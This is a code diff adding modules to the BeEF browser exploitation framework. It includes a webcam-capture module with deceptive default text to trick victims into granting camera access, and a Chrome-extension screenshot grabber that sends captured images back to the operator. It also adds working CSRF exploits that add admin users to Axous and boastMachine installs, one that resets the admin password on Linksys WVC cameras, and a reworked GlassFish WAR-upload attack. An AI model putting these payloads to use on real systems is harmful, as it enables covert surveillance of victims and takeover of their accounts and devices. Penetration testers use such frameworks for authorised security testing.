+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+require 'base64'
+class Webcam < BeEF::Core::Command
+  def pre_send
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/takeit.swf', '/takeit', 'swf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/swfobject.js', '/swfobject', 'js')
+  end
+  def self.options
+       configuration = BeEF::Core::Configuration.instance
+       social_engineering_title = "This website is using Adobe Flash"
+       social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience."
+       no_of_pictures = 20
+       interval = 1000
+       return [
+           {'name' => 'social_engineering_title', 
+            'description' => 'The title that is shown to the victim.',
+            'ui_label' => 'Social Engineering Title',
+            'value' => social_engineering_title,
+            'width' => '100px' }, {
+            'name' => 'social_engineering_text', 
+           'description' => 'The social engineering text you want to show to convince the user to click the Allow button.',
+           'ui_label' => 'Social Engineering Text',
+           'value' => social_engineering_text,
+           'width' => '300px',
+           'type' => 'textarea' }, {
+           'name' => 'no_of_pictures', 
+           'description' => 'The number of pictures you want to take after the victim clicked "allow".',
+           'ui_label' => 'Number of pictures',
+           'value' => no_of_pictures,
+           'width' => '100px' }, {
+            'name' => 'interval', 
+            'description' => 'The interval in which pictures are taken.',
+            'ui_label' => 'Interval to take pictures (ms)',
+            'value' => interval,
+            'width' => '100px' }
+           ]
+  end
+  
+  
+	def post_execute 
+		content = {}
+		content["result"] = @datastore["result"] if not @datastore["result"].nil?
+		content["picture"] = @datastore["picture"] if not @datastore["picture"].nil?
+		save content
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf')
+		BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+	end
+
+end

modules/chrome_extensions/screenshot/command.js

@@ -0,0 +1,22 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+    chrome.tabs.captureVisibleTab(null, function(img) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'img: ' + img.toString());
+    });
+});
+

modules/chrome_extensions/screenshot/config.yaml

@@ -0,0 +1,26 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        screenshot:
+            enable: true
+            category: "Chrome Extensions"
+            name: "Screenshot"
+            description: "Screenshots current tab the user is in, screenshot returned as base64d data for a dataurl"
+            authors: ["mh"]
+            target:
+                working: ["C"]
+                not_working: ["All"]

modules/chrome_extensions/screenshot/module.rb

@@ -0,0 +1,24 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Screenshot < BeEF::Core::Command
+ 
+  def post_execute
+    content = {}
+    content['Return'] = @datastore['return']
+    save content
+  end
+  
+end

modules/exploits/axous_1_1_1_add_user_csrf/command.js

@@ -0,0 +1,40 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	var base     = '<%= @base %>'; 
+	var username = '<%= @username %>';
+	var password = '<%= @password %>';
+	var email    = '<%= @email %>';
+
+	var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+		{'type':'hidden', 'name':'user_name',   'value':username},
+		{'type':'hidden', 'name':'new_passwd',  'value':password},
+		{'type':'hidden', 'name':'new_passwd1', 'value':password},
+		{'type':'hidden', 'name':'email',       'value':email},
+		{'type':'hidden', 'name':'dosubmit',    'value':'1'} ,
+		{'type':'hidden', 'name':'id',          'value':''},
+		{'type':'hidden', 'name':'action',      'value':'addnew'} ,
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(axous_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/axous_1_1_1_add_user_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        axous_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "Axous <= 1.1.1 Add User CSRF"
+            description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)."
+            authors: ["bcoles", "Ivano Binetti"]
+            target:
+                working: ["ALL"]

modules/exploits/axous_1_1_1_add_user_csrf/module.rb

@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Axous_add_user_csrf < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'},
+			{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+			{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/boastmachine_3_1_add_user_csrf/command.js

@@ -0,0 +1,41 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+	var base     = '<%= @base %>'; 
+	var username = '<%= @username %>';
+	var password = '<%= @password %>';
+	var email    = '<%= @email %>';
+
+	var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [
+		{'type':'hidden', 'name':'action',     'value':'add_user'},
+		{'type':'hidden', 'name':'do',         'value':'add'},
+		{'type':'hidden', 'name':'user_login', 'value':username},
+		{'type':'hidden', 'name':'user_pass',  'value':password},
+		{'type':'hidden', 'name':'user_name',  'value':username},
+		{'type':'hidden', 'name':'user_email', 'value':email},
+		{'type':'hidden', 'name':'blogs[]',    'value':'4'},
+		{'type':'hidden', 'name':'user_level', 'value':'4'},
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(boastmachine_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        boastmachine_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "boastMachine <= 3.1 Add User CSRF"
+            description: "Attempts to add a user to a boastMachine <= 3.1 install."
+            authors: ["bcoles", "Dr.NaNo"]
+            target:
+                working: ["ALL"]

modules/exploits/boastmachine_3_1_add_user_csrf/module.rb

@@ -0,0 +1,31 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Boastmachine_add_user_csrf < BeEF::Core::Command
+
+	def self.options
+		return [
+			{ 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'},
+			{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
+			{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
+			{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/camera/dlink_dcs_series_csrf/config.yaml

@@ -19,7 +19,7 @@ beef:
     module:
         Dlink_dcs_series_csrf:
             enable: true
-            category: ["Exploits","Camera"]
+            category: ["Exploits", "Camera"]
             name: "Dlink DCS series CSRF"
             description: "Attempts to change the password on a Dlink DCS series camera."
             authors: ["bcoles"]

modules/exploits/camera/linksys_wvc_wireless_camera_csrf/command.js

@@ -0,0 +1,44 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+  var gateway = '<%= @base %>'; 
+  var path    = 'adm/file.cgi';
+  var passwd  = '<%= @password %>';
+
+  var linksys_wvc_iframe = beef.dom.createIframeXsrfForm(gateway + path, "POST",
+    [{'type':'hidden', 'name':'adm',            'value':'admin'},
+     {'type':'hidden', 'name':'admpw',          'value':passwd},
+     {'type':'hidden', 'name':'admpwv',         'value':passwd},
+     {'type':'hidden', 'name':'language',       'value':'1'},
+     {'type':'hidden', 'name':'h_usernamelist', 'value':''},
+     {'type':'hidden', 'name':'h_language',     'value':'1'},
+     {'type':'hidden', 'name':'h_lang_from_mac','value':''},
+     {'type':'hidden', 'name':'this_file',      'value':'pass_wd.htm'},
+     {'type':'hidden', 'name':'next_file',      'value':'pass_wd.htm'},
+     {'type':'hidden', 'name':'todo',           'value':'save'},
+     {'type':'hidden', 'name':'video_file',     'value':''},
+     {'type':'hidden', 'name':'',               'value':'Submit form'}
+    ]);
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(linksys_wvc_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/camera/linksys_wvc_wireless_camera_csrf/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        linksys_wvc_wireless_camera_csrf:
+            enable: true
+            category: ["Exploits", "Camera"]
+            name: "Linksys WVC series CSRF"
+            description: "Attempts to change the admin password on a Linksys WVCseries wireless camera."
+            authors: ["bcoles", "n0x00"]
+            target:
+                working: ["ALL"]

modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb

@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/'},
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/glassfish_war_upload_xsrf/command.js

@@ -25,99 +25,6 @@ beef.execute(function() {
 	
   var logUrl = restHost + '/management/domain/applications/application';
 
-  //BEGIN Daniel Guerrero binary Base64-library
-/*
-Copyright (c) 2011, Daniel Guerrero
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-    * Redistributions of source code must retain the above copyright
-      notice, this list of conditions and the following disclaimer.
-    * Redistributions in binary form must reproduce the above copyright
-      notice, this list of conditions and the following disclaimer in the
-      documentation and/or other materials provided with the distribution.
-    * Neither the name of the Daniel Guerrero nor the
-      names of its contributors may be used to endorse or promote products
-      derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL DANIEL GUERRERO BE LIABLE FOR ANY
-DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
-ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
- */
-
-/**
- * Uses the new array typed in javascript to binary base64 encode/decode
- * at the moment just decodes a binary base64 encoded
- * into either an ArrayBuffer (decodeArrayBuffer)
- * or into an Uint8Array (decode)
- * 
- * References:
- * https://developer.mozilla.org/en/JavaScript_typed_arrays/ArrayBuffer
- * https://developer.mozilla.org/en/JavaScript_typed_arrays/Uint8Array
- */
-
-var Base64Binary = {
-	_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
-
-	/* will return a  Uint8Array type */
-	decodeArrayBuffer: function(input) {
-		var bytes = Math.ceil( (3*input.length) / 4.0);
-		var ab = new ArrayBuffer(bytes);
-		this.decode(input, ab);
-
-		return ab;
-	},
-
-	decode: function(input, arrayBuffer) {
-		//get last chars to see if are valid
-		var lkey1 = this._keyStr.indexOf(input.charAt(input.length-1)); 
-		var lkey2 = this._keyStr.indexOf(input.charAt(input.length-1)); 
-
-		var bytes = Math.ceil( (3*input.length) / 4.0);
-		if (lkey1 == 64) bytes--; //padding chars, so skip
-		if (lkey2 == 64) bytes--; //padding chars, so skip
-
-		var uarray;
-		var chr1, chr2, chr3;
-		var enc1, enc2, enc3, enc4;
-		var i = 0;
-		var j = 0;
-
-		if (arrayBuffer)
-			uarray = new Uint8Array(arrayBuffer);
-		else
-			uarray = new Uint8Array(bytes);
-
-		input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
-
-		for (i=0; i<bytes; i+=3) {	
-			//get the 3 octects in 4 ascii chars
-			enc1 = this._keyStr.indexOf(input.charAt(j++));
-			enc2 = this._keyStr.indexOf(input.charAt(j++));
-			enc3 = this._keyStr.indexOf(input.charAt(j++));
-			enc4 = this._keyStr.indexOf(input.charAt(j++));
-
-			chr1 = (enc1 << 2) | (enc2 >> 4);
-			chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
-			chr3 = ((enc3 & 3) << 6) | enc4;
-
-			uarray[i] = chr1;			
-			if (enc3 != 64) uarray[i+1] = chr2;
-			if (enc4 != 64) uarray[i+2] = chr3;
-		}
-
-		return uarray;	
-	}
-}
-  //END Daniel Guerrero binary Base64-library
 
   if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
     XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
@@ -204,10 +111,8 @@ var Base64Binary = {
     var c = "--" + boundary + "\r\n" 
     c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n'; 
     c += "Content-Type: application/octet-stream\r\n\r\n";
-
-    for(var i = 0; i< value.length; i++){
-      c+=String.fromCharCode(value[i] & 0xff);
-    }
+    
+    c += atob(value);
 
     c += "\r\n";
     return c;   
@@ -215,7 +120,7 @@ var Base64Binary = {
   
   
   function start() {
-    fileUpload(Base64Binary.decode(warBase),warName);
+    fileUpload(warBase,warName);
   }
 
   start();